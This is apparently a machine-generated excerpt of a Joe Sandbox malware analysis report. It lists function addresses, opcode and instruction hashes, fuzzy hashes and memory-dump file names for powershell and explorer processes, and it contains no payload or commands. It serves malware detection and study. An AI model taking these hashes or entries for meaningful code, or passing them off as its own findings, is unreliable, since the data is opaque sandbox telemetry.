                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                          • Instruction ID: 2d8e5c199f5335979778887b622e34919a8febb75adba4d6537578fae4bb4e89
                                                                          • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                          • Instruction Fuzzy Hash: 8601677121CB0D4FD748EF0CE451AA6B7E0FB99364F10056DE58AC36A5DA36E882CB45
                                                                          Function 00007FFD9B8A3428 Relevance: .0, Instructions: 46COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1898647347.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9b8a0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0ea3224fededb862c73b412190b38ab12614bba5c17fe80d02cae77ec77d79ec
                                                                          • Instruction ID: b4a53389b0460cefb70e55dbe9114543f6f45a89c33c7260302d4b18b48822b0
                                                                          • Opcode Fuzzy Hash: 0ea3224fededb862c73b412190b38ab12614bba5c17fe80d02cae77ec77d79ec
                                                                          • Instruction Fuzzy Hash: F3F03C6264E3C20FE3164768AC624A47FB0DE5323070952EBD4C1CA4A3D55A584B8761
                                                                          Function 00007FFD9B8AA0FB Relevance: .0, Instructions: 45COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1898647347.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9b8a0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7875aa702c0fbcd54d6589789ff2a470f8a8f304ebbeb8ef174bdadefe0f017e
                                                                          • Instruction ID: efa3f31e29830d23b9db226cf3d155da60e7b231dc67ef12b46d4b9750c47513
                                                                          • Opcode Fuzzy Hash: 7875aa702c0fbcd54d6589789ff2a470f8a8f304ebbeb8ef174bdadefe0f017e
                                                                          • Instruction Fuzzy Hash: 71F04C36A0BE8C5FD741DF1CD8654E47FA0FF65201B0501BBD489C3071DA31590887C1

                                                                          Non-executed Functions

                                                                          Function 00007FFD9B8A8BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1898647347.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9b8a0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: L_^8$L_^<$L_^?$L_^J$L_^K$L_^N$L_^Q$L_^Y
                                                                          • API String ID: 0-1415242001
                                                                          • Opcode ID: 43fc97dd348e09cb18fe9713d6d3d241ea91d68ddf1fc4c99a3e80af88e2cd8f
                                                                          • Instruction ID: e7c9e3fbdb16d3d3ea5212ac3ffb3de1b4bcdf25e518ceaaa350289893b59a2e
                                                                          • Opcode Fuzzy Hash: 43fc97dd348e09cb18fe9713d6d3d241ea91d68ddf1fc4c99a3e80af88e2cd8f
                                                                          • Instruction Fuzzy Hash: E72107B37045258AC30A37ADBC559ED7780DF5437834551F3E228CF153EF24A48B8A80

                                                                          Executed Functions

                                                                          Function 00007FFD9B88644D Relevance: .7, Instructions: 709COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2050284934.00007FFD9B885000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B885000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_7ffd9b885000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7f8d48ea091e4c4e30752d6c7d70dd965521aa5b18b00d35193ad4f83d7ca036
                                                                          • Instruction ID: dcf4063f0b1288d70c0bb9ee123470dd2df19d2a5db4d7435a496c09e997d50c
                                                                          • Opcode Fuzzy Hash: 7f8d48ea091e4c4e30752d6c7d70dd965521aa5b18b00d35193ad4f83d7ca036
                                                                          • Instruction Fuzzy Hash: F4D19170A08A4D8FDF99DF5CD464AA97BE1FF58300F15426AD41DD72A5CA34E881CB81
                                                                          Function 00007FFD9B956605 Relevance: .4, Instructions: 440COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2051443592.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_7ffd9b950000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 360e57a0acb61434a5d62957e9ab671263cc3dd6a318132bdbc40c9b112cc35d
                                                                          • Instruction ID: 0c1bdf82b01d7af9485d26fe1fa5b17359ac13cd16edd74fbcdf0b5a876b998b
                                                                          • Opcode Fuzzy Hash: 360e57a0acb61434a5d62957e9ab671263cc3dd6a318132bdbc40c9b112cc35d
                                                                          • Instruction Fuzzy Hash: 47D14532B1FBCE1FEBA59BA858645B57BA0EF16314B0901FED85CCB0E3D918A805C341
                                                                          Function 00007FFD9B889EF3 Relevance: .3, Instructions: 265COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2050284934.00007FFD9B885000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B885000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_7ffd9b885000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 872633fa9dad6a6c9ca5e193f8ebc8b45806fec390ea1c8e3b0b16f0be6c15ab
                                                                          • Instruction ID: 7aed7e35a7e4705e393321447c597f47601d768b20cdbcad6405c8dd1f502bfc
                                                                          • Opcode Fuzzy Hash: 872633fa9dad6a6c9ca5e193f8ebc8b45806fec390ea1c8e3b0b16f0be6c15ab
                                                                          • Instruction Fuzzy Hash: 2E715063B0BEA94BE716A7ACEC7A0D53B50EF15768B0901F3C5E88B0A3FD2425574781
                                                                          Function 00007FFD9B954073 Relevance: .2, Instructions: 186COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2051443592.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_7ffd9b950000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9c1853b752e819dd64852c90ebfbb190139b00d85ee96fbf4ce177455a133458
                                                                          • Instruction ID: 5b79c32fd8b1b4f53b7a092c2f8ba90bf31bcd7d7f79bcf3ecf16a68bdf81f64
                                                                          • Opcode Fuzzy Hash: 9c1853b752e819dd64852c90ebfbb190139b00d85ee96fbf4ce177455a133458
                                                                          • Instruction Fuzzy Hash: 79515932B5EA4A1FE7E9CAAC542267477D1EFA5220F1A40BEC45DC72EBDE14EC058341
                                                                          Function 00007FFD9B954370 Relevance: .1, Instructions: 146COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2051443592.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_7ffd9b950000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 38a81f4293bed55d2ac31f2c33bef67476abed940422e82ac74fee1c9c45070c
                                                                          • Instruction ID: a40e377b43d286b532e40cf16801e239874f29c09a8b0b31d25048ac5f33f140
                                                                          • Opcode Fuzzy Hash: 38a81f4293bed55d2ac31f2c33bef67476abed940422e82ac74fee1c9c45070c
                                                                          • Instruction Fuzzy Hash: 4D414C32B9EA495FEBF9DAAC54206B477D1EF44720B0900BED45DC72ABEA54FD018381
                                                                          Function 00007FFD9B889738 Relevance: .1, Instructions: 144COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2050284934.00007FFD9B885000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B885000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_7ffd9b885000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1b2009ba22308e11070482fff5a3d39fa370e5e2ed2625d2689ccd43f3d7d031
                                                                          • Instruction ID: d22e5c991f88dbf1d781ed18a438d124ee0e9c5c337f024b1369117d3b8cda78
                                                                          • Opcode Fuzzy Hash: 1b2009ba22308e11070482fff5a3d39fa370e5e2ed2625d2689ccd43f3d7d031
                                                                          • Instruction Fuzzy Hash: 27412831A0DF488FDB189F5C980A6A97BE0FB99310F10412FE45DC3292DB30A81587C2
                                                                          Function 00007FFD9B76ED40 Relevance: .1, Instructions: 124COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2049306001.00007FFD9B76D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B76D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_7ffd9b76d000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 35105dd4ee2ec551d32a07a966467ea9e0ccbc667f679b839bcf76b0c78bc99b
                                                                          • Instruction ID: cb0c2e8abdb927a594d62d9fe80657eb6f3ddce9f0da651ebfd11f46d5d9b8e9
                                                                          • Opcode Fuzzy Hash: 35105dd4ee2ec551d32a07a966467ea9e0ccbc667f679b839bcf76b0c78bc99b
                                                                          • Instruction Fuzzy Hash: 9941197140EBC49FE7669B289C519523FF0EF56220B1A06DFD088CB1B7D629AC45C7A3
                                                                          Function 00007FFD9B88A47C Relevance: .1, Instructions: 99COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2050284934.00007FFD9B885000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B885000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_7ffd9b885000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c556dd6702e6d15312cc9262af06ccd2914fa3dea1beea4cd3144e39a7911abe
                                                                          • Instruction ID: 7ecdb2ccaea3f2ffa36d84d06673aa90d19ddd956a35ff41baf256fe6d30e940
                                                                          • Opcode Fuzzy Hash: c556dd6702e6d15312cc9262af06ccd2914fa3dea1beea4cd3144e39a7911abe
                                                                          • Instruction Fuzzy Hash: 13212B3090CB4C8FDB59DFAC984A7E97FE0EB9A320F04416BD048C31A2D6749416CB91
                                                                          Function 00007FFD9B9540BF Relevance: .1, Instructions: 99COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2051443592.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_7ffd9b950000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: eacdde5515637f9b4e245349c0883633926f6aa5edc596a3114e60905a669abe
                                                                          • Instruction ID: 17a0b951a03790d39a0c5214b00e1b4c65c0f9cbe957cc48c4c5aa6750c7a749
                                                                          • Opcode Fuzzy Hash: eacdde5515637f9b4e245349c0883633926f6aa5edc596a3114e60905a669abe
                                                                          • Instruction Fuzzy Hash: 92210822B6F94A2FE7F9CA98446227067C1EF71210B5A40BDD85DC72FACE14EC058301
                                                                          Function 00007FFD9B9543BC Relevance: .1, Instructions: 62COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2051443592.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_7ffd9b950000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 903650dcb81dda413987301c387afa586ce11d301bde65c4344e097cbb7f4dd1
                                                                          • Instruction ID: 053e3cfe368acf34e33d18f6bb02eca1ed9c25a0df235f140b122be7ec458250
                                                                          • Opcode Fuzzy Hash: 903650dcb81dda413987301c387afa586ce11d301bde65c4344e097cbb7f4dd1
                                                                          • Instruction Fuzzy Hash: 7211E332B9F5495FE7F8DA9894706B437D0EF4032074600BAD81DC76BADA68BD018340
                                                                          Function 00007FFD9B8833B5 Relevance: .0, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2050284934.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_7ffd9b880000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                          • Instruction ID: 7942ddcb7b366def54c675fdc0a42c1b9c7b229ae68d60287c1eb1a1f3edd8da
                                                                          • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                          • Instruction Fuzzy Hash: 9001A73020CB0C4FD748EF0CE451AA6B3E0FB89320F10056DE58AC36A1DA32E882CB41

                                                                          Non-executed Functions

                                                                          Function 00007FFD9B888BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2050284934.00007FFD9B885000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B885000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_7ffd9b885000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: N_^4$N_^7$N_^F$N_^J
                                                                          • API String ID: 0-3508309026
                                                                          • Opcode ID: dabbe24802d554556fd15f6229eae3468619220f0459efd10296f077a3207134
                                                                          • Instruction ID: 3d73ddd26afee8af5c4e977c855be3ba5e549368567e4c73e868d7912246f78f
                                                                          • Opcode Fuzzy Hash: dabbe24802d554556fd15f6229eae3468619220f0459efd10296f077a3207134
                                                                          • Instruction Fuzzy Hash: B32107B77084358ED30A7BBCBD289D93740DB9423874501B3D2A9CB183E914608786C1

                                                                          Executed Functions

                                                                          Function 00007FFD9B8A644D Relevance: .7, Instructions: 710COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.2257850728.00007FFD9B8A5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A5000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_7ffd9b8a5000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ad904b9f29996baeba2ffc51c730b2f4268d89f1e413c5e3a414a8ce2e9413ba
                                                                          • Instruction ID: 4e04b0f00f4adeaa69875debdd5c82c005d34be73621f1e5ec448620e47eb3a0
                                                                          • Opcode Fuzzy Hash: ad904b9f29996baeba2ffc51c730b2f4268d89f1e413c5e3a414a8ce2e9413ba
                                                                          • Instruction Fuzzy Hash: ECD19170A18A4D8FDF99DF58C455AA9BBE1FF68300F15416AD409D72A9CB34E881CB81
                                                                          Function 00007FFD9B976605 Relevance: .4, Instructions: 440COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.2259149301.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_7ffd9b970000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b10e92ec02c00ae9fb563517ca087f905d58e3c90aa3bd050bd9c75c3c1dfed2
                                                                          • Instruction ID: c1c445e55b265b0c5fd38c3efb5602ac7bf2b264bf0e60cc2ab78150e87e41cd
                                                                          • Opcode Fuzzy Hash: b10e92ec02c00ae9fb563517ca087f905d58e3c90aa3bd050bd9c75c3c1dfed2
                                                                          • Instruction Fuzzy Hash: F6D15632A1EBCD1FEBA5D7A848A55B57BE1EF16310B0901FED49CC70E3DA18A905C341
                                                                          Function 00007FFD9B974073 Relevance: .2, Instructions: 186COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.2259149301.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_7ffd9b970000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6d8f049ad138d3a09c9a4931cef62e1cca07fddf407bec2cedf5cf35c117a19f
                                                                          • Instruction ID: fe843ce38d3e32de1341ad663af1e8df146ded5760a30b515f5f951b789da42e
                                                                          • Opcode Fuzzy Hash: 6d8f049ad138d3a09c9a4931cef62e1cca07fddf407bec2cedf5cf35c117a19f
                                                                          • Instruction Fuzzy Hash: 63515C32B2EA4A1FE7A9D65C54A277877D1EF65220B1A40BFC05DC72E7DE14EC058341
                                                                          Function 00007FFD9B974370 Relevance: .1, Instructions: 146COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.2259149301.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_7ffd9b970000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c68fc20c30468e77006d1e2462ca8f2c1d2b0175785dabe3c8729b96ef178c75
                                                                          • Instruction ID: 623cd467dde9ac21d28449600ae12abb557f382f647e39e8221c8d98803a7b52
                                                                          • Opcode Fuzzy Hash: c68fc20c30468e77006d1e2462ca8f2c1d2b0175785dabe3c8729b96ef178c75
                                                                          • Instruction Fuzzy Hash: 85414732B1EA495FEBB9D66C54A06B877D1EF84720B1A00BFD05DC72E7EA14ED018381
                                                                          Function 00007FFD9B8A9750 Relevance: .1, Instructions: 145COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.2257850728.00007FFD9B8A5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A5000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_7ffd9b8a5000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: dc6239c7782fb89e721553597930ee01850198c32dcd07d85876dca3aab672bc
                                                                          • Instruction ID: 64e6fc667e22caa96ffe71333b866261ff94590d149228a0fcf3fb1d3a314f0a
                                                                          • Opcode Fuzzy Hash: dc6239c7782fb89e721553597930ee01850198c32dcd07d85876dca3aab672bc
                                                                          • Instruction Fuzzy Hash: 73412A7190EB884FDB199F5C9C0A6A97FE0FB59310F04416FD499C3292CA74B945CBD2
                                                                          Function 00007FFD9B78F364 Relevance: .1, Instructions: 125COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.2256203655.00007FFD9B78D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_7ffd9b78d000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 79000a2299ecd3d25819a7187f330d05351a1ea64b6e098a749a84098a5e7d01
                                                                          • Instruction ID: 0452b5965a7f1ed8d94cc7e1d46ba6e92f034f3ad0a6275dd938afb8fd3536c3
                                                                          • Opcode Fuzzy Hash: 79000a2299ecd3d25819a7187f330d05351a1ea64b6e098a749a84098a5e7d01
                                                                          • Instruction Fuzzy Hash: 6041247150EFC44FE7568B3998919523FF0EF56221B160ADFD088CB1B3D625A84AC7A2
                                                                          Function 00007FFD9B8AA49C Relevance: .1, Instructions: 99COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.2257850728.00007FFD9B8A5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A5000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_7ffd9b8a5000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 24c86f78080ca981b47ba44e12b233156706ee8736387a7bc3f80899841ea12e
                                                                          • Instruction ID: f1c36c16767f8f00ba81c134d3b49cba9b92c4353694f1ba5185d71fcd5789fd
                                                                          • Opcode Fuzzy Hash: 24c86f78080ca981b47ba44e12b233156706ee8736387a7bc3f80899841ea12e
                                                                          • Instruction Fuzzy Hash: 1921E63190CB4C4FDB59DBAC984A7E97FE0EB96321F04416BD449C3162D674A816CB92
                                                                          Function 00007FFD9B9740BF Relevance: .1, Instructions: 99COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.2259149301.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_7ffd9b970000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c064d6ee7723ad9528f691e9949650d42bfecbb9610f5d6a53dec49581671fbd
                                                                          • Instruction ID: f8c3af2ed2c2bdcaf10027ffdd9ad2d06fab54840fe53598f94c3daedf568e24
                                                                          • Opcode Fuzzy Hash: c064d6ee7723ad9528f691e9949650d42bfecbb9610f5d6a53dec49581671fbd
                                                                          • Instruction Fuzzy Hash: 4A21C422B2E98A2FE7B9EA5844A227867C1EF65210B4A40BED05DC76B3DE14EC058341
                                                                          Function 00007FFD9B9743BC Relevance: .1, Instructions: 62COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.2259149301.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_7ffd9b970000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 86c3a930e507e56042750416859c87baeae5b368824a346fa306e7f59975697b
                                                                          • Instruction ID: d8699debce304b794fdc813ac6ea44084a7dd99a53847728c0d8735847e92d65
                                                                          • Opcode Fuzzy Hash: 86c3a930e507e56042750416859c87baeae5b368824a346fa306e7f59975697b
                                                                          • Instruction Fuzzy Hash: FC110232B1F5495FE7B8D65894B06B837D0FF40720B5A00BEE42DC76A3DA18BD018340
                                                                          Function 00007FFD9B8A33B5 Relevance: .0, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.2257850728.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_7ffd9b8a0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                          • Instruction ID: 2d8e5c199f5335979778887b622e34919a8febb75adba4d6537578fae4bb4e89
                                                                          • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                          • Instruction Fuzzy Hash: 8601677121CB0D4FD748EF0CE451AA6B7E0FB99364F10056DE58AC36A5DA36E882CB45

                                                                          Non-executed Functions

                                                                          Function 00007FFD9B8A8BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.2257850728.00007FFD9B8A5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A5000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_7ffd9b8a5000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: L_^8$L_^<$L_^?$L_^J$L_^K$L_^N$L_^Q$L_^Y
                                                                          • API String ID: 0-1415242001
                                                                          • Opcode ID: 376fa47dd52ce803f5d748140fcaab1eb293776c348edebb478c5cdf911be059
                                                                          • Instruction ID: e7c9e3fbdb16d3d3ea5212ac3ffb3de1b4bcdf25e518ceaaa350289893b59a2e
                                                                          • Opcode Fuzzy Hash: 376fa47dd52ce803f5d748140fcaab1eb293776c348edebb478c5cdf911be059
                                                                          • Instruction Fuzzy Hash: E72107B37045258AC30A37ADBC559ED7780DF5437834551F3E228CF153EF24A48B8A80

                                                                          Executed Functions

                                                                          Function 00007FFD9B880E69 Relevance: .6, Instructions: 637COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.2409463777.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7ffd9b880000_explorer.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1377c14cb173867a19cbe68b684984d6670fc23df7658eb70e410cd6468b3819
                                                                          • Instruction ID: 2d8da422927e2c6f1939016bad0449548228e35494089fac7dd4d39b18150c11
                                                                          • Opcode Fuzzy Hash: 1377c14cb173867a19cbe68b684984d6670fc23df7658eb70e410cd6468b3819
                                                                          • Instruction Fuzzy Hash: 1912C430B29E4A4BE7A8FB7898696B977D2FF9C304F410579E41DC32D6DE38A9418341
                                                                          Function 00007FFD9B880BEE Relevance: .3, Instructions: 254COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.2409463777.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7ffd9b880000_explorer.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 44f3da72df28c9a2191d3e518cae054745db3ee414b316446c45e5c9e2682c08
                                                                          • Instruction ID: 86f837338318acb8a1063ca566733b593cf9e8a1e688613401a83671836ae5b4
                                                                          • Opcode Fuzzy Hash: 44f3da72df28c9a2191d3e518cae054745db3ee414b316446c45e5c9e2682c08
                                                                          • Instruction Fuzzy Hash: 34714821F1DA8E0FE795AB7C98656B97BE2EF89210F0501BAD05DC32E7DD286C428341
                                                                          Function 00007FFD9B8815DD Relevance: .2, Instructions: 192COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.2409463777.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7ffd9b880000_explorer.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e54d39fc68707f740ed5252c2ca519db3ad130a4717eed67432dca442efb8719
                                                                          • Instruction ID: fc53ef35fbc56427654692724ac07c8c952d01e568a09a381b75bc41acbf4f5d
                                                                          • Opcode Fuzzy Hash: e54d39fc68707f740ed5252c2ca519db3ad130a4717eed67432dca442efb8719
                                                                          • Instruction Fuzzy Hash: B8512120B0EAC94FD79AAB7898756756BD1DF8A219B0804FBE0DDC71E7DD285806C342
